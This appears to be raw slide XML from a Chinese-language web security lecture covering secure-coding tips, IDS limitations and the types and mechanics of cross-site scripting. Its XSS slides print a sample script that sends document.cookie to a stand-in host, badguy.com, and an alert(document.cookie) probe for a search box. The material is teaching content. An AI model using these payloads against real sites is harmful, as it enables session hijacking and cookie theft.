              <a:t>应用的异常信息应该给出尽可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装，把异常信息输出到日志而不是在页面中展示。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b="0" dirty="0" smtClean="0"/>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>做好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>跨站攻击的防护，防止攻击者伪造管理员信息进入系统后台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b="0" dirty="0" smtClean="0"/>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>不管客户端是否做过数据校验，在服务端必须要有数据校验（长度、格式、是否必填等等）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注入漏洞的防护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22135" y="2946224"/>
            <a:ext cx="5812325" cy="5866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二、跨站脚本攻击及防范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跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）是指攻击者利用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程序对用户输入过滤不足的缺陷，把恶意代码注入其他的用户浏览器显示的页面上执行，从而窃取用户敏感信息、伪造用户身份进行恶意行为的一种攻击方式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跨站脚本攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27530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07AA455-75A4-4B91-B147-925C23037C72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324611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简单模式匹配技术的缺点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62259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如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>采用的检测技术主要是简单的模式匹配，那么几乎总有办法避开检测。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一种攻击方法的本质特征不在于攻击代码中出现哪些特殊字符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简单模式匹配的办法在检测病毒是有效，但是网络攻击要比病毒复杂得多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在检测病毒时，只需考虑可执行文件的格式就可以了，但网络中存在着各种协议和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>，攻击者拥有灵活性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4381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程序必须接收用户的输入，不仅包括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中的参数和表单字段，还包括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头部和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程序会重新显示用户输入的内容，只用用户浏览器将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程序提供的数据解释为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标记，攻击才会发生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跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击两个前提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1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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本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式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本攻击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跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击三种形式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0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跨站脚本攻击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306513"/>
            <a:ext cx="8229600" cy="1150937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工作原理： 输入插入包含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或其它恶意脚本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签代码。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468313" y="4149725"/>
            <a:ext cx="82296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问题根源：不当的服务器端输入检查，从而允许用户输入可被客户端浏览器解释的脚本命令。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XSS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最普遍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Web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程序安全问题。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900113" y="2422525"/>
            <a:ext cx="7416800" cy="1511300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ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>脚本的例子：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN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&lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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window.open(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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://badguy.com/info.pl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?document.cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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851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2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018" name="Picture 34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3932238"/>
            <a:ext cx="3598862" cy="2089150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="426017" name="Picture 33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341438"/>
            <a:ext cx="3671887" cy="2087562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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4450"/>
            <a:ext cx="7129463" cy="792163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</a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的原理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gray">
          <a:xfrm>
            <a:off x="6996113" y="4292600"/>
            <a:ext cx="17526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带有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XSS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漏洞的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Web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程序  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25990" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5754688" y="2709863"/>
            <a:ext cx="1066800" cy="733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25991" name="Picture 7" descr="TN_hacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print">
            <a:lum bright="24000" contrast="42000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="1763713"/>
            <a:ext cx="1093787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25994" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5881688" y="3860800"/>
            <a:ext cx="1066800" cy="801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3276600" y="2276475"/>
            <a:ext cx="2560638" cy="587375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攻击者将恶意脚本输入到服务器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r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页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2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639888" y="936625"/>
            <a:ext cx="2500312" cy="417513"/>
            <a:chOff x="1033" y="590"/>
            <a:chExt cx="1575" cy="263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gray">
            <a:xfrm>
              <a:off x="1321" y="590"/>
              <a:ext cx="12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攻击者设置陷阱 </a:t>
              </a:r>
              <a:endPara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25998" name="Oval 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1033" y="618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639888" y="3560763"/>
            <a:ext cx="4587875" cy="373062"/>
            <a:chOff x="1033" y="2243"/>
            <a:chExt cx="2890" cy="235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="425993" name="Oval 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1033" y="2243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itchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="425999" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1338" y="2251"/>
              <a:ext cx="258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受害者浏览页面 </a:t>
              </a:r>
              <a:endPara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827088" y="6021388"/>
            <a:ext cx="5735637" cy="444500"/>
            <a:chOff x="537" y="3785"/>
            <a:chExt cx="3613" cy="280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="425992" name="Oval 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="537" y="3785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itchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426000" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="916" y="3793"/>
              <a:ext cx="323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脚本将受害者的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Session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、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Cookie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发送给攻击者  </a:t>
              </a:r>
              <a:endPara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3133725" y="4826000"/>
            <a:ext cx="2590800" cy="835025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运行于受害者浏览器的脚本可以完全访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cookies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932613" y="2852738"/>
            <a:ext cx="1455737" cy="1412875"/>
            <a:chOff x="4336" y="1870"/>
            <a:chExt cx="917" cy="890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426003" name="Rectangle 19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Custom Code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426004" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="162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Accounts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426005" name="Rectangle 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="162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Finance</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426006" name="Rectangle 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="162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Administration</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426007" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="162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Transactions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426008" name="Rectangle 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="162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Communication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426009" name="Rectangle 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="162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Knowledge Mgmt</a:t>
              </a:r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ltGray">
            <a:xfrm rot="162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E-Commerce</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="426011" name="Rectangle 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="162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itchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>Bus. Functions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="426012" name="Picture 28" descr="businesswo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4178300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26013" name="Freeform 29"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="2676525"/>
            <a:ext cx="2768600" cy="3235325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1744" y="1704"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="976" y="2184"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="2184"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="16" y="1320"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="64" y="216"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="352" y="24"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1744" h="2328">
                <a:moveTo>
                  <a:pt x="1744" y="1704"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1492" y="1904"/>
                  <a:pt x="1240" y="2104"/>
                  <a:pt x="976" y="2184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="712" y="2264"/>
                  <a:pt x="320" y="2328"/>
                  <a:pt x="160" y="2184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2040"/>
                  <a:pt x="32" y="1648"/>
                  <a:pt x="16" y="1320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="992"/>
                  <a:pt x="8" y="432"/>
                  <a:pt x="64" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="0"/>
                  <a:pt x="236" y="12"/>
                  <a:pt x="352" y="2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nimBg="1"/>
      <p:bldP spid="425994" grpId="0" animBg="1"/>
      <p:bldP spid="425997" grpId="0" animBg="1"/>
      <p:bldP spid="426001" grpId="0" animBg="1"/>
      <p:bldP spid="4260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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>探测示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="427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981075"/>
            <a:ext cx="51117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70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575" y="4089400"/>
            <a:ext cx="3001963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27024" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="1741488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“Search”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框内的文本信息常会反馈回用户页面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4643438" y="1801813"/>
            <a:ext cx="1000125" cy="404812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6" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="576263" y="2708275"/>
            <a:ext cx="5724525" cy="473075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="158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ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;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  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427027" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5940425" y="4371975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脚本执行并将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Session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信息通过对话框显示出来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 flipH="1">
            <a:off x="4714875" y="4508500"/>
            <a:ext cx="1009650" cy="406400"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 62109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1692275" y="1863725"/>
            <a:ext cx="1511300" cy="2889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7030" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7524750" y="2708275"/>
            <a:ext cx="100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攻击测试脚本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 flipH="1">
            <a:off x="6442075" y="2781300"/>
            <a:ext cx="1009650" cy="406400"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 62109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7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4" grpId="0"/>
      <p:bldP spid="427025" grpId="0" animBg="1"/>
      <p:bldP spid="427026" grpId="0" animBg="1"/>
      <p:bldP spid="427027" grpId="0"/>
      <p:bldP spid="427028" grpId="0" animBg="1"/>
      <p:bldP spid="427029" grpId="0" animBg="1"/>
      <p:bldP spid="427030" grpId="0"/>
      <p:bldP spid="4270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30238" y="1296988"/>
            <a:ext cx="7772400" cy="4818062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>也称为非持久性跨站脚本攻击，是一种最常见的跨站脚本攻击类型。与本地脚本漏洞不同的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>客户端使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>端脚本生成页面为用户提供数据时，如果未经验证的用户数据被包含在页面中而未经</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>实体编码，客户端代码便能够注入到动态页面中。在这种攻击模式下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>程序不会存储恶意脚本，它会将未经验证的数据通过请求发送给客户端，攻击者就可以构造恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="0" dirty="0"/>
              <a:t>链接或表单并诱骗用户访问，最终达到利用受害者身份执行恶意代码的目的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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8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6799" y="863355"/>
            <a:ext cx="7772400" cy="4818062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(1) Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>经常浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>建立的网站。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的站点运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>使用用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>密码进行登录，并存储敏感信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>比如银行帐户信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Charly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的站点包含反射性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>漏洞；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Charly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>编写一个利用漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>，并将其冒充为来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的邮件发送给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>； </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(4) Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>在登录到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的站点后，浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Charly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>提供的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(5) </a:t>
            </a:r>
            <a:r>
